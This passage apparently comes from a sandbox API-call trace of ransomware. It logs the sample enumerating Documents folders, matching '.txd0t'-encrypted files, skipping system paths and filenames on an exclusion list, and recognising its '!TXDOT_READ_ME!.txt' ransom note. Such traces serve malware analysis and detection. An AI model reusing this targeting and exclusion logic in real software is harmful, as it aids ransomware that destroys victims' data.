psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\hnSSITWu7H4.odt.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\hnSSITWu7H4.odt.txd0t" [0129.546] PathFindExtensionW (pszPath="hnSSITWu7H4.odt.txd0t") returned=".txd0t" [0129.546] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.546] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43a94a60, ftCreationTime.dwHighDateTime=0x1d5ed12, ftLastAccessTime.dwLowDateTime=0x464da5e0, ftLastAccessTime.dwHighDateTime=0x1d5e600, ftLastWriteTime.dwLowDateTime=0x5197eacc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x4b8c, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="j7-b.pdf.txd0t", cAlternateFileName="J7-BPD~1.TXD")) returned 1 [0129.547] StrCmpW (psz1="j7-b.pdf.txd0t", psz2=".") returned 1 [0129.547] StrCmpW (psz1="j7-b.pdf.txd0t", psz2="..") returned 1 [0129.547] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0129.547] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", psz2="\\", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\" [0129.547] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\", psz2="j7-b.pdf.txd0t", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\j7-b.pdf.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\j7-b.pdf.txd0t" [0129.547] PathFindExtensionW (pszPath="j7-b.pdf.txd0t") returned=".txd0t" [0129.547] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.547] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcadeab70, ftCreationTime.dwHighDateTime=0x1d5e9c4, ftLastAccessTime.dwLowDateTime=0xa568d710, ftLastAccessTime.dwHighDateTime=0x1d5ebbf, ftLastWriteTime.dwLowDateTime=0x5197eacc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x74c4, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="LFpWuQJ-aF.doc.txd0t", cAlternateFileName="LFPWUQ~1.TXD")) returned 1 [0129.547] StrCmpW (psz1="LFpWuQJ-aF.doc.txd0t", psz2=".") returned 1 [0129.547] StrCmpW (psz1="LFpWuQJ-aF.doc.txd0t", psz2="..") returned 1 [0129.547] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0129.547] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", psz2="\\", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\" [0129.547] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\", psz2="LFpWuQJ-aF.doc.txd0t", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\LFpWuQJ-aF.doc.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\LFpWuQJ-aF.doc.txd0t" [0129.547] PathFindExtensionW (pszPath="LFpWuQJ-aF.doc.txd0t") returned=".txd0t" [0129.547] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.547] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7e3bae0, ftCreationTime.dwHighDateTime=0x1d5ea3a, ftLastAccessTime.dwLowDateTime=0xace66270, ftLastAccessTime.dwHighDateTime=0x1d5ef41, ftLastWriteTime.dwLowDateTime=0x519a4caf, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xaf0b, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="wUuIQI1na.odp.txd0t", cAlternateFileName="WUUIQI~1.TXD")) returned 1 [0129.547] StrCmpW (psz1="wUuIQI1na.odp.txd0t", psz2=".") returned 1 [0129.547] StrCmpW (psz1="wUuIQI1na.odp.txd0t", psz2="..") returned 1 [0129.547] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0129.547] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", psz2="\\", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\" [0129.547] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\", psz2="wUuIQI1na.odp.txd0t", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\wUuIQI1na.odp.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\wUuIQI1na.odp.txd0t" [0129.548] PathFindExtensionW (pszPath="wUuIQI1na.odp.txd0t") returned=".txd0t" [0129.548] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.548] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7e3bae0, ftCreationTime.dwHighDateTime=0x1d5ea3a, ftLastAccessTime.dwLowDateTime=0xace66270, ftLastAccessTime.dwHighDateTime=0x1d5ef41, ftLastWriteTime.dwLowDateTime=0x519a4caf, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xaf0b, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="wUuIQI1na.odp.txd0t", cAlternateFileName="WUUIQI~1.TXD")) returned 0 [0129.548] FindClose (in: hFindFile=0xec1930 | out: hFindFile=0xec1930) returned 1 [0129.548] GetProcessHeap () returned 0xe30000 [0129.548] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0129.548] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebf37130, ftCreationTime.dwHighDateTime=0x1d5ed0f, ftLastAccessTime.dwLowDateTime=0xc2d85810, ftLastAccessTime.dwHighDateTime=0x1d5e6f2, ftLastWriteTime.dwLowDateTime=0x519cafed, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x10e7a, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="xuaWupFvOSfqE.pps.txd0t", cAlternateFileName="XUAWUP~1.TXD")) returned 1 [0129.548] StrCmpW (psz1="xuaWupFvOSfqE.pps.txd0t", psz2=".") returned 1 [0129.548] StrCmpW (psz1="xuaWupFvOSfqE.pps.txd0t", psz2="..") returned 1 [0129.548] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0129.548] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\" [0129.548] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\", psz2="xuaWupFvOSfqE.pps.txd0t", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\xuaWupFvOSfqE.pps.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\xuaWupFvOSfqE.pps.txd0t" [0129.548] PathFindExtensionW (pszPath="xuaWupFvOSfqE.pps.txd0t") returned=".txd0t" [0129.548] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.548] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf966ba0, ftCreationTime.dwHighDateTime=0x1d5f04a, ftLastAccessTime.dwLowDateTime=0x51aafdfc, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51aafdfc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="_L78DH7wK y2TBjiEU", cAlternateFileName="_L78DH~1")) returned 1 [0129.548] StrCmpW (psz1="_L78DH7wK y2TBjiEU", psz2=".") returned 1 [0129.548] StrCmpW (psz1="_L78DH7wK y2TBjiEU", psz2="..") returned 1 [0129.548] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0129.548] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\" [0129.548] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\", psz2="_L78DH7wK y2TBjiEU", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0129.548] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\windows\\system32\\") returned 0x0 [0129.548] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.548] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\windows\\system\\") returned 0x0 [0129.548] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.548] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.548] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\appdata\\local\\") returned 0x0 [0129.548] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.548] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.549] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.549] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch=":\\boot\\") returned 0x0 [0129.549] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch=":\\perflogs\\") returned 0x0 [0129.549] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch=":\\programdata\\") returned 0x0 [0129.549] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch=":\\drivers\\") returned 0x0 [0129.549] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch=":\\wsus\\") returned 0x0 [0129.549] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.549] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.549] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="crypt_detect") returned 0x0 [0129.549] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="cryptolocker") returned 0x0 [0129.549] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="ransomware") returned 0x0 [0129.549] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="C:\\WINDOWS") returned 0x0 [0129.549] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.549] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", lpSrch="C:\\Program Files") returned 0x0 [0129.549] GetProcessHeap () returned 0xe30000 [0129.549] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4f4) returned 0xef3600 [0129.549] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0129.549] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\*", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\*") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\*" [0129.549] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\*", lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf966ba0, ftCreationTime.dwHighDateTime=0x1d5f04a, ftLastAccessTime.dwLowDateTime=0x51aafdfc, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51aafdfc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1c70 [0129.549] StrCmpW (psz1=".", psz2=".") returned 0 [0129.549] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf966ba0, ftCreationTime.dwHighDateTime=0x1d5f04a, ftLastAccessTime.dwLowDateTime=0x51aafdfc, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51aafdfc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.549] StrCmpW (psz1="..", psz2=".") returned 1 [0129.550] StrCmpW (psz1="..", psz2="..") returned 0 [0129.550] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x519f1183, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x519f1183, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x519f1183, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0129.550] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0129.550] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0129.550] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0129.550] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0129.550] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\!TXDOT_READ_ME!.txt" [0129.550] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.550] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.550] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.550] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.550] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.550] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.550] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.550] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.550] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.550] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.550] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.550] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.550] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.550] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.550] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.550] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.551] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabcb4b0, ftCreationTime.dwHighDateTime=0x1d5eeb8, ftLastAccessTime.dwLowDateTime=0x6f5cfd20, ftLastAccessTime.dwHighDateTime=0x1d5ecf7, ftLastWriteTime.dwLowDateTime=0x519cafed, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1fb3, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="CNnaWo_J.xls.txd0t", cAlternateFileName="CNNAWO~1.TXD")) returned 1 [0129.551] StrCmpW (psz1="CNnaWo_J.xls.txd0t", psz2=".") returned 1 [0129.551] StrCmpW (psz1="CNnaWo_J.xls.txd0t", psz2="..") returned 1 [0129.551] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0129.551] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0129.551] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="CNnaWo_J.xls.txd0t", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\CNnaWo_J.xls.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\CNnaWo_J.xls.txd0t" [0129.551] PathFindExtensionW (pszPath="CNnaWo_J.xls.txd0t") returned=".txd0t" [0129.551] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.551] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3bd1d60, ftCreationTime.dwHighDateTime=0x1d5e397, ftLastAccessTime.dwLowDateTime=0xc80579a0, ftLastAccessTime.dwHighDateTime=0x1d5ed7b, ftLastWriteTime.dwLowDateTime=0x519f1183, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x5ae8, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="EPWE.xlsx.txd0t", cAlternateFileName="EPWEXL~1.TXD")) returned 1 [0129.551] StrCmpW (psz1="EPWE.xlsx.txd0t", psz2=".") returned 1 [0129.551] StrCmpW (psz1="EPWE.xlsx.txd0t", psz2="..") returned 1 [0129.551] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0129.551] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0129.551] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="EPWE.xlsx.txd0t", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\EPWE.xlsx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\EPWE.xlsx.txd0t" [0129.551] PathFindExtensionW (pszPath="EPWE.xlsx.txd0t") returned=".txd0t" [0129.551] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.551] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3ab2080, ftCreationTime.dwHighDateTime=0x1d5ec18, ftLastAccessTime.dwLowDateTime=0x976cfd20, ftLastAccessTime.dwHighDateTime=0x1d5ebe8, ftLastWriteTime.dwLowDateTime=0x51a1751f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x6758, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="JzVy_5xEKQ.xlsx.txd0t", cAlternateFileName="JZVY_5~1.TXD")) returned 1 [0129.551] StrCmpW (psz1="JzVy_5xEKQ.xlsx.txd0t", psz2=".") returned 1 [0129.551] StrCmpW (psz1="JzVy_5xEKQ.xlsx.txd0t", psz2="..") returned 1 [0129.551] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0129.551] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0129.551] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="JzVy_5xEKQ.xlsx.txd0t", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\JzVy_5xEKQ.xlsx.txd0t") 